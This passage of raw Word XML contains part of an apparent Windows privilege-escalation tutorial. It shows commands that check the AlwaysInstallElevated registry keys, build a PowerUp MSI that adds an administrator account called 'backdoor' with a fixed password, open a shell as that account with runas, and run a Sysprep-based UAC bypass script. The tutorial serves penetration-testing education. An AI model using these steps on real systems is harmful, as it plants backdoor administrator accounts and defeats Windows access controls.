            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>Always Install Elevated</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> key is present and set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC64A14"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color w:val="FF0000"/>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We can also validate this using the Command Prompt by querying the corresponding registry keys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E14B1F6"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 xml:space="preserve">C:\&gt; reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>AlwaysInstallElevated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7AFC1C41"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34D4ED6A"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HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A4C276"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ab/>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>AlwaysInstallElevated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">    REG_DWORD    0x1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C52998"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44D9884E"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684EFB3D"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 xml:space="preserve">C:\&gt; reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>AlwaysInstallElevated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39094A5F"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3476F7FA"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HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53140703"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lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>AlwaysInstallElevated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">    REG_DWORD    0x1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425DEC16"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Once more, we can make use of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>PowerUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, using it's </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Write-UserAddMSI</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> function. This function facilitates the creation of an </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>msi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> file directly on the desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2836D459"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PS C:\Users\pmorgan\Desktop&gt; Import-Module .\PowerUp.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7D1154"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PS C:\Users\pmorgan\Desktop&gt; Write-UserAddMSI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0EA9CC"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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C94A843"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Output Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E07F22B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E2680A"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UserAdd.msi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BE0A65"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Now we can execute </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>UserAdd.msi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and create a new user </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>backdoor:T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>3st@123</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> under Administrators group. Note that giving it a password that doesn’t meet the password complexity criteria will throw an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A19876" w14:textId="2068E676"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600E61D6" wp14:editId="35067DFB">
            <wp:extent cx="3908656" cy="3074180"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="868305289"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8208" cy="3081692"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1062C38F"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Back in CMD execute </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>runas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to start command prompt as the newly created </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>backdoor</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F4EC83"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 xml:space="preserve">C:\&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>runas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>user:backdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A2233D5"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1D2B4ED8"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Enter the password for backdoor: T3st@123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217C6D7E"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 xml:space="preserve">Attempting to start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> as user "VDESKTOP3\backdoor" ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D813704" w14:textId="77777777" w:rsidR="00C06BC9" w:rsidRPr="00C06BC9" w:rsidRDefault="00C06BC9" w:rsidP="00C06BC9">
      <w:pPr>
        <w:spacing w:after="0"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pict w14:anchorId="22CC2D4E">
          <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21286FCB" w14:textId="77777777" w:rsidR="00C06BC9" w:rsidRPr="00C06BC9" w:rsidRDefault="00C06BC9" w:rsidP="00C06BC9">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Bypassing UAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27558255"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Even though the newly established user </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>backdoor</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a member of </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Administrators</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> group, accessing the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>C:\users\Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory remains unfeasible due to the presence of User Account Control (UAC). UAC is a security mechanism implemented in Windows to protect the operating system from unauthorized changes. With UAC, each application that requires the administrator access token must prompt the end user for consent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1675CA94"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C:\Windows\system32&gt; cd C:\Users\Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE93F1F"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p>
    <w:p w14:paraId="72275A4E" w14:textId="77777777" w:rsidR="00C06BC9" w:rsidRPr="00C06BC9" w:rsidRDefault="00C06BC9" w:rsidP="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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Access is denied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC05E91"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Numerous </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C06BC9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>UAC bypass</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> scripts are available, designed to assist in circumventing the active User Account Control (UAC) mechanism. These scripts offer methods to navigate past UAC restrictions and gain elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F8C0CE"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PS C:\Users\Public&gt; Import-Module .\Bypass-UAC.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1209A0C4" w14:textId="77777777" w:rsidR="00C06BC9" w:rsidRPr="00C06BC9" w:rsidRDefault="00C06BC9" w:rsidP="00C06BC9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="01245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0" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">PS C:\Users\Public&gt; Bypass-UAC -Method </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>UacMethodSysprep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1669317C" w14:textId="3006E511"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0DF2C5A8" wp14:editId="1798298B">
            <wp:extent cx="3930053" cy="3091009"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="571581800"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38350" cy="3097535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9C10F3"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 xml:space="preserve">Following a successful UAC bypass, a new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C06BC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
